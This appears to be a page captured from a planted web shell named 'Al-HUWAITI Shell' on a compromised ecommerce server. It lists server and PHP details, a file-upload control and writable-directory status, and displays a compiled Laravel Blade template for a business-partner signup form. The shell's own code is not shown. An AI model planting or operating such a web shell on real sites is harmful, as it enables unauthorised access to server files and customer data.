Al-HUWAITI Shell
Al-huwaiti


Server : nginx/1.18.0
System : Linux localhost 6.14.3-x86_64-linode168 #1 SMP PREEMPT_DYNAMIC Mon Apr 21 19:47:55 EDT 2025 x86_64
User : www-data ( 33)
PHP Version : 8.0.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Directory :  /var/www/ecommerce/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/ecommerce/storage/framework/views/6456aac8027404cd41913e4d1fa3b0bc873d6a86.php
<?php $__env->startSection('title', 'For Business'); ?>

<?php $__env->startSection('contents'); ?>
    <div class="website-banner position-relative">
        <div style="background: url('frontend/svg/banner-bg.svg') white">
            <div class="container d-none d-sm-block">
                <div class="row">
                    <div class="col-sm-7" style="z-index: 2">
                        <h1 class="text-e-primary font-weight-bold" style="font-size: 72px;">Drive Sales</h1>
                        <h2 class="font-weight-bold" style="font-size: 54px;">Give your Customers<br /> the Ability to
                            Pay<br /> How they
                            Want</h2>
                        <h6 class="mb-4 font-px-22 font-weight-normal" style="line-height: 32px">
                            Explore the ease of having an exciting payment medium that<br />
                            offers greater opportunity and is concerned about your metric now
                        </h6>
                        <div class="mb-4">
                            <a href="#" class="btn btn-success btn-lg mr-4">Get Started</a>
                            <a href="#" class="text-e-primary">Learn More <span class="ti-angle-right"></span></a>
                        </div>

                        <div class="py-4 d-flex align-items-center">
                            <span class="font-weight-bold pr-2">40%</span><span class="font-px-14 pr-4">Increase in Average
                                Order Value</span>
                            <span class="font-weight-bold pr-2">35%</span><span class="font-px-14">Increase in
                                Conversion</span>
                        </div>
                    </div>

                    <div class="col-sm-5 text-right">
                        <?php echo svg_html('mobile', 'img-fluid', 420); ?>

                    </div>
                </div>
            </div>

            <div class="container d-block d-sm-none">
                <div class="row">
                    <div class="col-sm-6 text-center mb-4">
                        <?php echo svg_html('mobile', 'img-fluid', 300, 400); ?>

                    </div>
                    <div class="col-sm-6" style="z-index: 2">
                        <h1 class="text-e-primary font-weight-bold h1">Drive Sales</h1>
                        <h2 class="font-weight-bold" style="font-size: 34px;">Give your Customers<br /> the Ability to
                            Pay<br /> How they
                            Want</h2>
                        <h6 class="mb-4 h6 font-weight-normal" style="line-height: 32px">
                            Explore the ease of having an exciting payment medium that offers greater opportunity and is
                            concerned about your metric now
                        </h6>
                        <div class="mb-4">
                            <a href="#" class="btn btn-success btn-lg mr-4">Get Started</a>
                            <a href="#" class="text-e-primary">Learn More <span class="ti-angle-right"></span></a>
                        </div>

                        <div class="py-4 d-flex align-items-center">
                            <span class="font-weight-bold pr-2">40%</span><span class="font-px-14 pr-4">Increase in Average
                                Order Value</span>
                            <span class="font-weight-bold pr-2">35%</span><span class="font-px-14">Increase in
                                Conversion</span>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="rect"></div>
    </div>

    <div class="website-section mb-5">
        <div class="container">
            <div class="row">
                <div class="col">

                    <div class="col-sm-12 text-center section-head mb-4">
                        <h5 style="color:#FFCC4D;">We are here for you</h5>
                        <h3><?php echo e(__('Our Partner')); ?></h3>
                    </div>

                    <form method="POST" action="<?php echo e(route('website.partner.store')); ?>">
                        <?php echo csrf_field(); ?>

                        <div class="form-group row">
                            <label for="name"
                                class="col-md-4 col-form-label text-md-right"><?php echo e(__('Name of Business')); ?></label>

                            <div class="col-md-6">
                                <input type="text" class="form-control form-control-lg <?php $__errorArgs = ['name'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?> is-invalid <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>"
                                    name="name" value="<?php echo e(old('name')); ?>" required autocomplete="name" autofocus>

                                <?php $__errorArgs = ['name'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?>
                                    <span class="invalid-feedback" role="alert">
                                        <strong><?php echo e($message); ?></strong>
                                    </span>
                                <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>
                            </div>
                        </div>

                        <div class="form-group row">
                            <label for="email"
                                class="col-md-4 col-form-label text-md-right"><?php echo e(__('E-Mail')); ?></label>

                            <div class="col-md-6">
                                <input type="email" class="form-control form-control-lg <?php $__errorArgs = ['email'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?> is-invalid <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>"
                                    name="email" value="<?php echo e(old('email')); ?>" required autocomplete="email">

                                <?php $__errorArgs = ['email'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?>
                                    <span class="invalid-feedback" role="alert">
                                        <strong><?php echo e($message); ?></strong>
                                    </span>
                                <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>
                            </div>
                        </div>

                        <div class="form-group row">
                            <label for="address"
                                class="col-md-4 col-form-label text-md-right"><?php echo e(__('Address')); ?></label>

                            <div class="col-md-6">
                                <textarea name="address"
                                    class="form-control form-control-lg <?php $__errorArgs = ['password'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?> is-invalid <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>"><?php echo e(old('address')); ?></textarea>

                                <?php $__errorArgs = ['address'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?>
                                    <span class="invalid-feedback" role="alert">
                                        <strong><?php echo e($message); ?></strong>
                                    </span>
                                <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>
                            </div>
                        </div>

                        <div class="form-group row">
                            <label for="mobile"
                                class="col-md-4 col-form-label text-md-right"><?php echo e(__('Contact number')); ?></label>

                            <div class="col-md-6">
                                <input type="tel" class="form-control form-control-lg <?php $__errorArgs = ['mobile'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?> is-invalid <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>" name="mobile">

                                <?php $__errorArgs = ['mobile'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?>
                                    <span class="invalid-feedback" role="alert">
                                        <strong><?php echo e($message); ?></strong>
                                    </span>
                                <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>
                            </div>
                        </div>

                        <div class="form-group row">
                            <label for="type"
                                class="col-md-4 col-form-label text-md-right"><?php echo e(__('Type of Business')); ?></label>

                            <div class="col-md-6">
                                <input type="text" class="form-control form-control-lg <?php $__errorArgs = ['type'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?> is-invalid <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>" name="type">

                                <?php $__errorArgs = ['type'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?>
                                    <span class="invalid-feedback" role="alert">
                                        <strong><?php echo e($message); ?></strong>
                                    </span>
                                <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>
                            </div>
                        </div>

                        <div class="form-group row mb-0">
                            <div class="col-md-6 offset-md-4">
                                <button type="submit" class="btn btn-success btn-lg">
                                    <?php echo e(__('Contact Us')); ?>

                                </button>
                            </div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>

<?php $__env->stopSection(); ?>


<?php $__env->startSection('scripts'); ?>
    <script>
    </script>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('website.partials.main', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /var/www/ecommerce/resources/views/website/for_business.blade.php ENDPATH**/ ?>

Al-HUWAITI Shell